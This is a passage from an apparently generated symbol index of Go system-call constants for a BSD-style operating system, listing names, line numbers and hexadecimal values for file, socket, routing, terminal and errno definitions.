NET_RT_MAXID (line 1081) | NET_RT_MAXID = 0x6 constant NET_RT_OIFLIST (line 1082) | NET_RT_OIFLIST = 0x4 constant NET_RT_OOIFLIST (line 1083) | NET_RT_OOIFLIST = 0x3 constant NFDBITS (line 1084) | NFDBITS = 0x20 constant NOFLSH (line 1085) | NOFLSH = 0x80000000 constant NOTE_ATTRIB (line 1086) | NOTE_ATTRIB = 0x8 constant NOTE_CHILD (line 1087) | NOTE_CHILD = 0x4 constant NOTE_DELETE (line 1088) | NOTE_DELETE = 0x1 constant NOTE_EXEC (line 1089) | NOTE_EXEC = 0x20000000 constant NOTE_EXIT (line 1090) | NOTE_EXIT = 0x80000000 constant NOTE_EXTEND (line 1091) | NOTE_EXTEND = 0x4 constant NOTE_FORK (line 1092) | NOTE_FORK = 0x40000000 constant NOTE_LINK (line 1093) | NOTE_LINK = 0x10 constant NOTE_LOWAT (line 1094) | NOTE_LOWAT = 0x1 constant NOTE_PCTRLMASK (line 1095) | NOTE_PCTRLMASK = 0xf0000000 constant NOTE_PDATAMASK (line 1096) | NOTE_PDATAMASK = 0xfffff constant NOTE_RENAME (line 1097) | NOTE_RENAME = 0x20 constant NOTE_REVOKE (line 1098) | NOTE_REVOKE = 0x40 constant NOTE_TRACK (line 1099) | NOTE_TRACK = 0x1 constant NOTE_TRACKERR (line 1100) | NOTE_TRACKERR = 0x2 constant NOTE_WRITE (line 1101) | NOTE_WRITE = 0x2 constant OCRNL (line 1102) | OCRNL = 0x10 constant OFIOGETBMAP (line 1103) | OFIOGETBMAP = 0xc004667a constant ONLCR (line 1104) | ONLCR = 0x2 constant ONLRET (line 1105) | ONLRET = 0x40 constant ONOCR (line 1106) | ONOCR = 0x20 constant ONOEOT (line 1107) | ONOEOT = 0x8 constant OPOST (line 1108) | OPOST = 0x1 constant O_ACCMODE (line 1109) | O_ACCMODE = 0x3 constant O_ALT_IO (line 1110) | O_ALT_IO = 0x40000 constant O_APPEND (line 1111) | O_APPEND = 0x8 constant O_ASYNC (line 1112) | O_ASYNC = 0x40 constant O_CLOEXEC (line 1113) | O_CLOEXEC = 0x400000 constant O_CREAT (line 1114) | O_CREAT = 0x200 constant O_DIRECT (line 1115) | O_DIRECT = 0x80000 constant O_DIRECTORY (line 1116) | O_DIRECTORY = 0x200000 constant O_DSYNC (line 1117) | O_DSYNC = 0x10000 constant O_EXCL (line 1118) | O_EXCL = 0x800 constant O_EXLOCK (line 1119) | O_EXLOCK = 0x20 constant O_FSYNC (line 1120) | O_FSYNC = 0x80 constant O_NDELAY (line 1121) | O_NDELAY = 0x4 constant O_NOCTTY (line 1122) | O_NOCTTY = 0x8000 constant O_NOFOLLOW (line 1123) | O_NOFOLLOW = 0x100 constant O_NONBLOCK (line 1124) | O_NONBLOCK = 0x4 constant O_NOSIGPIPE (line 1125) | O_NOSIGPIPE = 0x1000000 constant O_RDONLY (line 1126) | O_RDONLY = 0x0 constant O_RDWR (line 1127) | O_RDWR = 0x2 constant O_RSYNC (line 1128) | O_RSYNC = 0x20000 constant O_SHLOCK (line 1129) | O_SHLOCK = 0x10 constant O_SYNC (line 1130) | O_SYNC = 0x80 constant O_TRUNC (line 1131) | O_TRUNC = 0x400 constant O_WRONLY (line 1132) | O_WRONLY = 0x1 constant PARENB (line 1133) | PARENB = 0x1000 constant PARMRK (line 1134) | PARMRK = 0x8 constant PARODD (line 1135) | PARODD = 0x2000 constant PENDIN (line 1136) | PENDIN = 0x20000000 constant PRIO_PGRP (line 1137) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 1138) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 1139) | PRIO_USER = 0x2 constant PRI_IOFLUSH (line 1140) | PRI_IOFLUSH = 0x7c constant PROT_EXEC (line 1141) | PROT_EXEC = 0x4 constant PROT_NONE (line 1142) | PROT_NONE = 0x0 constant PROT_READ (line 1143) | PROT_READ = 0x1 constant PROT_WRITE (line 1144) | PROT_WRITE = 0x2 constant RLIMIT_AS (line 1145) | RLIMIT_AS = 0xa constant RLIMIT_CORE (line 1146) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 1147) | RLIMIT_CPU = 0x0 constant RLIMIT_DATA (line 1148) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 1149) | RLIMIT_FSIZE = 0x1 constant RLIMIT_MEMLOCK (line 1150) | RLIMIT_MEMLOCK = 0x6 constant RLIMIT_NOFILE (line 1151) | RLIMIT_NOFILE = 0x8 constant RLIMIT_NPROC (line 1152) | RLIMIT_NPROC = 0x7 constant RLIMIT_RSS (line 1153) | RLIMIT_RSS = 0x5 constant RLIMIT_STACK (line 1154) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 1155) | RLIM_INFINITY = 0x7fffffffffffffff constant RTAX_AUTHOR (line 1156) | RTAX_AUTHOR = 0x6 constant RTAX_BRD (line 1157) | RTAX_BRD = 0x7 constant RTAX_DST (line 1158) | RTAX_DST = 0x0 constant RTAX_GATEWAY (line 1159) | RTAX_GATEWAY = 0x1 constant RTAX_GENMASK (line 1160) | RTAX_GENMASK = 0x3 constant RTAX_IFA (line 1161) | RTAX_IFA = 0x5 constant RTAX_IFP (line 1162) | RTAX_IFP = 0x4 constant RTAX_MAX (line 1163) | RTAX_MAX = 0x9 constant RTAX_NETMASK (line 1164) | RTAX_NETMASK = 0x2 constant RTAX_TAG (line 1165) | RTAX_TAG = 0x8 constant RTA_AUTHOR (line 1166) | RTA_AUTHOR = 0x40 constant RTA_BRD (line 1167) | RTA_BRD = 0x80 constant RTA_DST (line 1168) | RTA_DST = 0x1 constant RTA_GATEWAY (line 1169) | RTA_GATEWAY = 0x2 constant RTA_GENMASK (line 1170) | RTA_GENMASK = 0x8 constant RTA_IFA (line 1171) | RTA_IFA = 0x20 constant RTA_IFP (line 1172) | RTA_IFP = 0x10 constant RTA_NETMASK (line 1173) | RTA_NETMASK = 0x4 constant RTA_TAG (line 1174) | RTA_TAG = 0x100 constant RTF_ANNOUNCE (line 1175) | RTF_ANNOUNCE = 0x20000 constant RTF_BLACKHOLE (line 1176) | RTF_BLACKHOLE = 0x1000 constant RTF_CLONED (line 1177) | RTF_CLONED = 0x2000 constant RTF_CLONING (line 1178) | RTF_CLONING = 0x100 constant RTF_DONE (line 1179) | RTF_DONE = 0x40 constant RTF_DYNAMIC (line 1180) | RTF_DYNAMIC = 0x10 constant RTF_GATEWAY (line 1181) | RTF_GATEWAY = 0x2 constant RTF_HOST (line 1182) | RTF_HOST = 0x4 constant RTF_LLINFO (line 1183) | RTF_LLINFO = 0x400 constant RTF_MASK (line 1184) | RTF_MASK = 0x80 constant RTF_MODIFIED (line 1185) | RTF_MODIFIED = 0x20 constant RTF_PROTO1 (line 1186) | RTF_PROTO1 = 0x8000 constant RTF_PROTO2 (line 1187) | RTF_PROTO2 = 0x4000 constant RTF_REJECT (line 1188) | RTF_REJECT = 0x8 constant RTF_SRC (line 1189) | RTF_SRC = 0x10000 constant RTF_STATIC (line 1190) | RTF_STATIC = 0x800 constant RTF_UP (line 1191) | RTF_UP = 0x1 constant RTF_XRESOLVE (line 1192) | RTF_XRESOLVE = 0x200 constant RTM_ADD (line 1193) | RTM_ADD = 0x1 constant RTM_CHANGE (line 1194) | RTM_CHANGE = 0x3 constant RTM_CHGADDR (line 1195) | RTM_CHGADDR = 0x15 constant RTM_DELADDR (line 1196) | RTM_DELADDR = 0xd constant RTM_DELETE (line 1197) | RTM_DELETE = 0x2 constant RTM_GET (line 1198) | RTM_GET = 0x4 constant RTM_IEEE80211 (line 1199) | RTM_IEEE80211 = 0x11 constant RTM_IFANNOUNCE (line 1200) | RTM_IFANNOUNCE = 0x10 constant RTM_IFINFO (line 1201) | RTM_IFINFO = 0x14 constant RTM_LLINFO_UPD (line 1202) | RTM_LLINFO_UPD = 0x13 constant RTM_LOCK (line 1203) | RTM_LOCK = 0x8 constant RTM_LOSING (line 1204) | RTM_LOSING = 0x5 constant RTM_MISS (line 1205) | RTM_MISS = 0x7 constant RTM_NEWADDR (line 1206) | RTM_NEWADDR = 0xc constant RTM_OIFINFO (line 1207) | RTM_OIFINFO = 0xf constant RTM_OLDADD (line 1208) | RTM_OLDADD = 0x9 constant RTM_OLDDEL (line 1209) | RTM_OLDDEL = 0xa constant RTM_OOIFINFO (line 1210) | RTM_OOIFINFO = 0xe constant RTM_REDIRECT (line 1211) | RTM_REDIRECT = 0x6 constant RTM_RESOLVE (line 1212) | RTM_RESOLVE = 0xb constant RTM_RTTUNIT (line 1213) | RTM_RTTUNIT = 0xf4240 constant RTM_SETGATE (line 1214) | RTM_SETGATE = 0x12 constant RTM_VERSION (line 1215) | RTM_VERSION = 0x4 constant RTV_EXPIRE (line 1216) | RTV_EXPIRE = 0x4 constant RTV_HOPCOUNT (line 1217) | RTV_HOPCOUNT = 0x2 constant RTV_MTU (line 1218) | RTV_MTU = 0x1 constant RTV_RPIPE (line 1219) | RTV_RPIPE = 0x8 constant RTV_RTT (line 1220) | RTV_RTT = 0x40 constant RTV_RTTVAR (line 1221) | RTV_RTTVAR = 0x80 constant RTV_SPIPE (line 1222) | RTV_SPIPE = 0x10 constant RTV_SSTHRESH (line 1223) | RTV_SSTHRESH = 0x20 constant RUSAGE_CHILDREN (line 1224) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 1225) | RUSAGE_SELF = 0x0 constant SCM_CREDS (line 1226) | SCM_CREDS = 0x4 constant SCM_RIGHTS (line 1227) | SCM_RIGHTS = 0x1 constant SCM_TIMESTAMP (line 1228) | SCM_TIMESTAMP = 0x8 constant SHUT_RD (line 1229) | SHUT_RD = 0x0 constant SHUT_RDWR (line 1230) | SHUT_RDWR = 0x2 constant SHUT_WR (line 1231) | SHUT_WR = 0x1 constant SIOCADDMULTI (line 1232) | SIOCADDMULTI = 0x80906931 constant SIOCADDRT (line 1233) | SIOCADDRT = 0x8038720a constant SIOCAIFADDR (line 1234) | SIOCAIFADDR = 0x8040691a constant SIOCALIFADDR (line 1235) | SIOCALIFADDR = 0x8118691c constant SIOCATMARK (line 1236) | SIOCATMARK = 0x40047307 constant SIOCDELMULTI (line 1237) | SIOCDELMULTI = 0x80906932 constant SIOCDELRT (line 1238) | SIOCDELRT = 0x8038720b constant SIOCDIFADDR (line 1239) | SIOCDIFADDR = 0x80906919 constant SIOCDIFPHYADDR (line 1240) | SIOCDIFPHYADDR = 0x80906949 constant SIOCDLIFADDR (line 1241) | SIOCDLIFADDR = 0x8118691e constant SIOCGDRVSPEC (line 1242) | SIOCGDRVSPEC = 0xc028697b constant SIOCGETPFSYNC (line 1243) | SIOCGETPFSYNC = 0xc09069f8 constant SIOCGETSGCNT (line 1244) | SIOCGETSGCNT = 0xc0207534 constant SIOCGETVIFCNT (line 1245) | SIOCGETVIFCNT = 0xc0287533 constant SIOCGHIWAT (line 1246) | SIOCGHIWAT = 0x40047301 constant SIOCGIFADDR (line 1247) | SIOCGIFADDR = 0xc0906921 constant SIOCGIFADDRPREF (line 1248) | SIOCGIFADDRPREF = 0xc0986920 constant SIOCGIFALIAS (line 1249) | SIOCGIFALIAS = 0xc040691b constant SIOCGIFBRDADDR (line 1250) | SIOCGIFBRDADDR = 0xc0906923 constant SIOCGIFCAP (line 1251) | SIOCGIFCAP = 0xc0206976 constant SIOCGIFCONF (line 1252) | SIOCGIFCONF = 0xc0106926 constant SIOCGIFDATA (line 1253) | SIOCGIFDATA = 0xc0986985 constant SIOCGIFDLT (line 1254) | SIOCGIFDLT = 0xc0906977 constant SIOCGIFDSTADDR (line 1255) | SIOCGIFDSTADDR = 0xc0906922 constant SIOCGIFFLAGS (line 1256) | SIOCGIFFLAGS = 0xc0906911 constant SIOCGIFGENERIC (line 1257) | SIOCGIFGENERIC = 0xc090693a constant SIOCGIFMEDIA (line 1258) | SIOCGIFMEDIA = 0xc0306936 constant SIOCGIFMETRIC (line 1259) | SIOCGIFMETRIC = 0xc0906917 constant SIOCGIFMTU (line 1260) | SIOCGIFMTU = 0xc090697e constant SIOCGIFNETMASK (line 1261) | SIOCGIFNETMASK = 0xc0906925 constant SIOCGIFPDSTADDR (line 1262) | SIOCGIFPDSTADDR = 0xc0906948 constant SIOCGIFPSRCADDR (line 1263) | SIOCGIFPSRCADDR = 0xc0906947 constant SIOCGLIFADDR (line 1264) | SIOCGLIFADDR = 0xc118691d constant SIOCGLIFPHYADDR (line 1265) | SIOCGLIFPHYADDR = 0xc118694b constant SIOCGLINKSTR (line 1266) | SIOCGLINKSTR = 0xc0286987 constant SIOCGLOWAT (line 1267) | SIOCGLOWAT = 0x40047303 constant SIOCGPGRP (line 1268) | SIOCGPGRP = 0x40047309 constant SIOCGVH (line 1269) | SIOCGVH = 0xc0906983 constant SIOCIFCREATE (line 1270) | SIOCIFCREATE = 0x8090697a constant SIOCIFDESTROY (line 1271) | SIOCIFDESTROY = 0x80906979 constant SIOCIFGCLONERS (line 1272) | SIOCIFGCLONERS = 0xc0106978 constant SIOCINITIFADDR (line 1273) | SIOCINITIFADDR = 0xc0706984 constant SIOCSDRVSPEC (line 1274) | SIOCSDRVSPEC = 0x8028697b constant SIOCSETPFSYNC (line 1275) | SIOCSETPFSYNC = 0x809069f7 constant SIOCSHIWAT (line 1276) | SIOCSHIWAT = 0x80047300 constant SIOCSIFADDR (line 1277) | SIOCSIFADDR = 0x8090690c constant SIOCSIFADDRPREF (line 1278) | SIOCSIFADDRPREF = 0x8098691f constant SIOCSIFBRDADDR (line 1279) | SIOCSIFBRDADDR = 0x80906913 constant SIOCSIFCAP (line 1280) | SIOCSIFCAP = 0x80206975 constant SIOCSIFDSTADDR (line 1281) | SIOCSIFDSTADDR = 0x8090690e constant SIOCSIFFLAGS (line 1282) | SIOCSIFFLAGS = 0x80906910 constant SIOCSIFGENERIC (line 1283) | SIOCSIFGENERIC = 0x80906939 constant SIOCSIFMEDIA (line 1284) | SIOCSIFMEDIA = 0xc0906935 constant SIOCSIFMETRIC (line 1285) | SIOCSIFMETRIC = 0x80906918 constant SIOCSIFMTU (line 1286) | SIOCSIFMTU = 0x8090697f constant SIOCSIFNETMASK (line 1287) | SIOCSIFNETMASK = 0x80906916 constant SIOCSIFPHYADDR (line 1288) | SIOCSIFPHYADDR = 0x80406946 constant SIOCSLIFPHYADDR (line 1289) | SIOCSLIFPHYADDR = 0x8118694a constant SIOCSLINKSTR (line 1290) | SIOCSLINKSTR = 0x80286988 constant SIOCSLOWAT (line 1291) | SIOCSLOWAT = 0x80047302 constant SIOCSPGRP (line 1292) | SIOCSPGRP = 0x80047308 constant SIOCSVH (line 1293) | SIOCSVH = 0xc0906982 constant SIOCZIFDATA (line 1294) | SIOCZIFDATA = 0xc0986986 constant SOCK_CLOEXEC (line 1295) | SOCK_CLOEXEC = 0x10000000 constant SOCK_DGRAM (line 1296) | SOCK_DGRAM = 0x2 constant SOCK_FLAGS_MASK (line 1297) | SOCK_FLAGS_MASK = 0xf0000000 constant SOCK_NONBLOCK (line 1298) | SOCK_NONBLOCK = 0x20000000 constant SOCK_NOSIGPIPE (line 1299) | SOCK_NOSIGPIPE = 0x40000000 constant SOCK_RAW (line 1300) | SOCK_RAW = 0x3 constant SOCK_RDM (line 1301) | SOCK_RDM = 0x4 constant SOCK_SEQPACKET (line 1302) | SOCK_SEQPACKET = 0x5 constant SOCK_STREAM (line 1303) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 1304) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 1305) | SOMAXCONN = 0x80 constant SO_ACCEPTCONN (line 1306) | SO_ACCEPTCONN = 0x2 constant SO_ACCEPTFILTER (line 1307) | SO_ACCEPTFILTER = 0x1000 constant SO_BROADCAST (line 1308) | SO_BROADCAST = 0x20 constant SO_DEBUG (line 1309) | SO_DEBUG = 0x1 constant SO_DONTROUTE (line 1310) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 1311) | SO_ERROR = 0x1007 constant SO_KEEPALIVE (line 1312) | SO_KEEPALIVE = 0x8 constant SO_LINGER (line 1313) | SO_LINGER = 0x80 constant SO_NOHEADER (line 1314) | SO_NOHEADER = 0x100a constant SO_NOSIGPIPE (line 1315) | SO_NOSIGPIPE = 0x800 constant SO_OOBINLINE (line 1316) | SO_OOBINLINE = 0x100 constant SO_OVERFLOWED (line 1317) | SO_OVERFLOWED = 0x1009 constant SO_RCVBUF (line 1318) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 1319) | SO_RCVLOWAT = 0x1004 constant SO_RCVTIMEO (line 1320) | SO_RCVTIMEO = 0x100c constant SO_REUSEADDR (line 1321) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 1322) | SO_REUSEPORT = 0x200 constant SO_SNDBUF (line 1323) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 1324) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 1325) | SO_SNDTIMEO = 0x100b constant SO_TIMESTAMP (line 1326) | SO_TIMESTAMP = 0x2000 constant SO_TYPE (line 1327) | SO_TYPE = 0x1008 constant SO_USELOOPBACK (line 1328) | SO_USELOOPBACK = 0x40 constant SYSCTL_VERSION (line 1329) | SYSCTL_VERSION = 0x1000000 constant SYSCTL_VERS_0 (line 1330) | SYSCTL_VERS_0 = 0x0 constant SYSCTL_VERS_1 (line 1331) | SYSCTL_VERS_1 = 0x1000000 constant SYSCTL_VERS_MASK (line 1332) | SYSCTL_VERS_MASK = 0xff000000 constant S_ARCH1 (line 1333) | S_ARCH1 = 0x10000 constant S_ARCH2 (line 1334) | S_ARCH2 = 0x20000 constant S_BLKSIZE (line 1335) | S_BLKSIZE = 0x200 constant S_IEXEC (line 1336) | S_IEXEC = 0x40 constant S_IFBLK (line 1337) | S_IFBLK = 0x6000 constant S_IFCHR (line 1338) | S_IFCHR = 0x2000 constant S_IFDIR (line 1339) | S_IFDIR = 0x4000 constant S_IFIFO (line 1340) | S_IFIFO = 0x1000 constant S_IFLNK (line 1341) | S_IFLNK = 0xa000 constant S_IFMT (line 1342) | S_IFMT = 0xf000 constant S_IFREG (line 1343) | S_IFREG = 0x8000 constant S_IFSOCK (line 1344) | S_IFSOCK = 0xc000 constant S_IFWHT (line 1345) | S_IFWHT = 0xe000 constant S_IREAD (line 1346) | S_IREAD = 0x100 constant S_IRGRP (line 1347) | S_IRGRP = 0x20 constant S_IROTH (line 1348) | S_IROTH = 0x4 constant S_IRUSR (line 1349) | S_IRUSR = 0x100 constant S_IRWXG (line 1350) | S_IRWXG = 0x38 constant S_IRWXO (line 1351) | S_IRWXO = 0x7 constant S_IRWXU (line 1352) | S_IRWXU = 0x1c0 constant S_ISGID (line 1353) | S_ISGID = 0x400 constant S_ISTXT (line 1354) | S_ISTXT = 0x200 constant S_ISUID (line 1355) | S_ISUID = 0x800 constant S_ISVTX (line 1356) | S_ISVTX = 0x200 constant S_IWGRP (line 1357) | S_IWGRP = 0x10 constant S_IWOTH (line 1358) | S_IWOTH = 0x2 constant S_IWRITE (line 1359) | S_IWRITE = 0x80 constant S_IWUSR (line 1360) | S_IWUSR = 0x80 constant S_IXGRP (line 1361) | S_IXGRP = 0x8 constant S_IXOTH (line 1362) | S_IXOTH = 0x1 constant S_IXUSR (line 1363) | S_IXUSR = 0x40 constant S_LOGIN_SET (line 1364) | S_LOGIN_SET = 0x1 constant TCIFLUSH (line 1365) | TCIFLUSH = 0x1 constant TCIOFLUSH (line 1366) | TCIOFLUSH = 0x3 constant TCOFLUSH (line 1367) | TCOFLUSH = 0x2 constant TCP_CONGCTL (line 1368) | TCP_CONGCTL = 0x20 constant TCP_KEEPCNT (line 1369) | TCP_KEEPCNT = 0x6 constant TCP_KEEPIDLE (line 1370) | TCP_KEEPIDLE = 0x3 constant TCP_KEEPINIT (line 1371) | TCP_KEEPINIT = 0x7 constant TCP_KEEPINTVL (line 1372) | TCP_KEEPINTVL = 0x5 constant TCP_MAXBURST (line 1373) | TCP_MAXBURST = 0x4 constant TCP_MAXSEG (line 1374) | TCP_MAXSEG = 0x2 constant TCP_MAXWIN (line 1375) | TCP_MAXWIN = 0xffff constant TCP_MAX_WINSHIFT (line 1376) | TCP_MAX_WINSHIFT = 0xe constant TCP_MD5SIG (line 1377) | TCP_MD5SIG = 0x10 constant TCP_MINMSS (line 1378) | TCP_MINMSS = 0xd8 constant TCP_MSS (line 1379) | TCP_MSS = 0x218 constant TCP_NODELAY (line 1380) | TCP_NODELAY = 0x1 constant TCSAFLUSH (line 1381) | TCSAFLUSH = 0x2 constant TIOCCBRK (line 1382) | TIOCCBRK = 0x2000747a constant TIOCCDTR (line 1383) | TIOCCDTR = 0x20007478 constant TIOCCONS (line 1384) | TIOCCONS = 0x80047462 constant TIOCDCDTIMESTAMP (line 1385) | TIOCDCDTIMESTAMP = 0x40107458 constant TIOCDRAIN (line 1386) | TIOCDRAIN = 0x2000745e constant TIOCEXCL (line 1387) | TIOCEXCL = 0x2000740d constant TIOCEXT (line 1388) | TIOCEXT = 0x80047460 constant TIOCFLAG_CDTRCTS (line 1389) | TIOCFLAG_CDTRCTS = 0x10 constant TIOCFLAG_CLOCAL (line 1390) | TIOCFLAG_CLOCAL = 0x2 constant TIOCFLAG_CRTSCTS (line 1391) | TIOCFLAG_CRTSCTS = 0x4 constant TIOCFLAG_MDMBUF (line 1392) | TIOCFLAG_MDMBUF = 0x8 constant TIOCFLAG_SOFTCAR (line 1393) | TIOCFLAG_SOFTCAR = 0x1 constant TIOCFLUSH (line 1394) | TIOCFLUSH = 0x80047410 constant TIOCGETA (line 1395) | TIOCGETA = 0x402c7413 constant TIOCGETD (line 1396) | TIOCGETD = 0x4004741a constant TIOCGFLAGS (line 1397) | TIOCGFLAGS = 0x4004745d constant TIOCGLINED (line 1398) | TIOCGLINED = 0x40207442 constant TIOCGPGRP (line 1399) | TIOCGPGRP = 0x40047477 constant TIOCGQSIZE (line 1400) | TIOCGQSIZE = 0x40047481 constant TIOCGRANTPT (line 1401) | TIOCGRANTPT = 0x20007447 constant TIOCGSID (line 1402) | TIOCGSID = 0x40047463 constant TIOCGSIZE (line 1403) | TIOCGSIZE = 0x40087468 constant TIOCGWINSZ (line 1404) | TIOCGWINSZ = 0x40087468 constant TIOCMBIC (line 1405) | TIOCMBIC = 0x8004746b constant TIOCMBIS (line 1406) | TIOCMBIS = 0x8004746c constant TIOCMGET (line 1407) | TIOCMGET = 0x4004746a constant TIOCMSET (line 1408) | TIOCMSET = 0x8004746d constant TIOCM_CAR (line 1409) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 1410) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 1411) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 1412) | TIOCM_DSR = 0x100 constant TIOCM_DTR (line 1413) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 1414) | TIOCM_LE = 0x1 constant TIOCM_RI (line 1415) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 1416) | TIOCM_RNG = 0x80 constant TIOCM_RTS (line 1417) | TIOCM_RTS = 0x4 constant TIOCM_SR (line 1418) | TIOCM_SR = 0x10 constant TIOCM_ST (line 1419) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 1420) | TIOCNOTTY = 0x20007471 constant TIOCNXCL (line 1421) | TIOCNXCL = 0x2000740e constant TIOCOUTQ (line 1422) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 1423) | TIOCPKT = 0x80047470 constant TIOCPKT_DATA (line 1424) | TIOCPKT_DATA = 0x0 constant TIOCPKT_DOSTOP (line 1425) | TIOCPKT_DOSTOP = 0x20 constant TIOCPKT_FLUSHREAD (line 1426) | TIOCPKT_FLUSHREAD = 0x1 constant TIOCPKT_FLUSHWRITE (line 1427) | TIOCPKT_FLUSHWRITE = 0x2 constant TIOCPKT_IOCTL (line 1428) | TIOCPKT_IOCTL = 0x40 constant TIOCPKT_NOSTOP (line 1429) | TIOCPKT_NOSTOP = 0x10 constant TIOCPKT_START (line 1430) | TIOCPKT_START = 0x8 constant TIOCPKT_STOP (line 1431) | TIOCPKT_STOP = 0x4 constant TIOCPTMGET (line 1432) | TIOCPTMGET = 0x40287446 constant TIOCPTSNAME (line 1433) | TIOCPTSNAME = 0x40287448 constant TIOCRCVFRAME (line 1434) | TIOCRCVFRAME = 0x80087445 constant TIOCREMOTE (line 1435) | TIOCREMOTE = 0x80047469 constant TIOCSBRK (line 1436) | TIOCSBRK = 0x2000747b constant TIOCSCTTY (line 1437) | TIOCSCTTY = 0x20007461 constant TIOCSDTR (line 1438) | TIOCSDTR = 0x20007479 constant TIOCSETA (line 1439) | TIOCSETA = 0x802c7414 constant TIOCSETAF (line 1440) | TIOCSETAF = 0x802c7416 constant TIOCSETAW (line 1441) | TIOCSETAW = 0x802c7415 constant TIOCSETD (line 1442) | TIOCSETD = 0x8004741b constant TIOCSFLAGS (line 1443) | TIOCSFLAGS = 0x8004745c constant TIOCSIG (line 1444) | TIOCSIG = 0x2000745f constant TIOCSLINED (line 1445) | TIOCSLINED = 0x80207443 constant TIOCSPGRP (line 1446) | TIOCSPGRP = 0x80047476 constant TIOCSQSIZE (line 1447) | TIOCSQSIZE = 0x80047480 constant TIOCSSIZE (line 1448) | TIOCSSIZE = 0x80087467 constant TIOCSTART (line 1449) | TIOCSTART = 0x2000746e constant TIOCSTAT (line 1450) | TIOCSTAT = 0x80047465 constant TIOCSTI (line 1451) | TIOCSTI = 0x80017472 constant TIOCSTOP (line 1452) | TIOCSTOP = 0x2000746f constant TIOCSWINSZ (line 1453) | TIOCSWINSZ = 0x80087467 constant TIOCUCNTL (line 1454) | TIOCUCNTL = 0x80047466 constant TIOCXMTFRAME (line 1455) | TIOCXMTFRAME = 0x80087444 constant TOSTOP (line 1456) | TOSTOP = 0x400000 constant VDISCARD (line 1457) | VDISCARD = 0xf constant VDSUSP (line 1458) | VDSUSP = 0xb constant VEOF (line 1459) | VEOF = 0x0 constant VEOL (line 1460) | VEOL = 0x1 constant VEOL2 (line 1461) | VEOL2 = 0x2 constant VERASE (line 1462) | VERASE = 0x3 constant VINTR (line 1463) | VINTR = 0x8 constant VKILL (line 1464) | VKILL = 0x5 constant VLNEXT (line 1465) | VLNEXT = 0xe constant VMIN (line 1466) | VMIN = 0x10 constant VQUIT (line 1467) | VQUIT = 0x9 constant VREPRINT (line 1468) | VREPRINT = 0x6 constant VSTART (line 1469) | VSTART = 0xc constant VSTATUS (line 1470) | VSTATUS = 0x12 constant VSTOP (line 1471) | VSTOP = 0xd constant VSUSP (line 1472) | VSUSP = 0xa constant VTIME (line 1473) | VTIME = 0x11 constant VWERASE (line 1474) | VWERASE = 0x4 constant WALL (line 1475) | WALL = 0x8 constant WALLSIG (line 1476) | WALLSIG = 0x8 constant WALTSIG (line 1477) | WALTSIG = 0x4 constant WCLONE (line 1478) | WCLONE = 0x4 constant WCOREFLAG (line 1479) | WCOREFLAG = 0x80 constant WNOHANG (line 1480) | WNOHANG = 0x1 constant WNOWAIT (line 1481) | WNOWAIT = 0x10000 constant WNOZOMBIE (line 1482) | WNOZOMBIE = 0x20000 constant WOPTSCHECKED (line 1483) | WOPTSCHECKED = 0x40000 constant WSTOPPED (line 1484) | WSTOPPED = 0x7f constant WUNTRACED (line 1485) | WUNTRACED = 0x2 constant E2BIG (line 1490) | E2BIG = syscall.Errno(0x7) constant EACCES (line 1491) | EACCES = syscall.Errno(0xd) constant EADDRINUSE (line 1492) | EADDRINUSE = syscall.Errno(0x30) constant EADDRNOTAVAIL (line 1493) | EADDRNOTAVAIL = syscall.Errno(0x31) constant EAFNOSUPPORT (line 1494) | EAFNOSUPPORT = syscall.Errno(0x2f) constant EAGAIN (line 1495) | EAGAIN = syscall.Errno(0x23) constant EALREADY (line 1496) | EALREADY = syscall.Errno(0x25) constant EAUTH (line 1497) | EAUTH = syscall.Errno(0x50) constant EBADF (line 1498) | EBADF = syscall.Errno(0x9) constant EBADMSG (line 1499) | EBADMSG = syscall.Errno(0x58) constant EBADRPC (line 1500) | EBADRPC = syscall.Errno(0x48) constant EBUSY (line 1501) | EBUSY = syscall.Errno(0x10) constant ECANCELED (line 1502) | ECANCELED = syscall.Errno(0x57) constant ECHILD (line 1503) | ECHILD = syscall.Errno(0xa) constant ECONNABORTED (line 1504) | ECONNABORTED = syscall.Errno(0x35) constant ECONNREFUSED (line 1505) | ECONNREFUSED = syscall.Errno(0x3d) constant ECONNRESET (line 1506) | ECONNRESET = syscall.Errno(0x36) constant EDEADLK (line 1507) | EDEADLK = syscall.Errno(0xb) constant EDESTADDRREQ (line 1508) | EDESTADDRREQ = syscall.Errno(0x27) constant EDOM (line 1509) | EDOM = syscall.Errno(0x21) constant EDQUOT (line 1510) | EDQUOT = syscall.Errno(0x45) constant EEXIST (line 1511) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 1512) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 1513) | EFBIG = syscall.Errno(0x1b) constant EFTYPE (line 1514) | EFTYPE = syscall.Errno(0x4f) constant EHOSTDOWN (line 1515) | EHOSTDOWN = syscall.Errno(0x40) constant EHOSTUNREACH (line 1516) | EHOSTUNREACH = syscall.Errno(0x41) constant EIDRM (line 1517) | EIDRM = syscall.Errno(0x52) constant EILSEQ (line 1518) | EILSEQ = syscall.Errno(0x55) constant EINPROGRESS (line 1519) | EINPROGRESS = syscall.Errno(0x24) constant EINTR (line 1520) | EINTR = syscall.Errno(0x4) constant EINVAL (line 1521) | EINVAL = syscall.Errno(0x16) constant EIO (line 1522) | EIO = syscall.Errno(0x5) constant EISCONN (line 1523) | EISCONN = syscall.Errno(0x38) constant EISDIR (line 1524) | EISDIR = syscall.Errno(0x15) constant ELAST (line 1525) | ELAST = syscall.Errno(0x60) constant 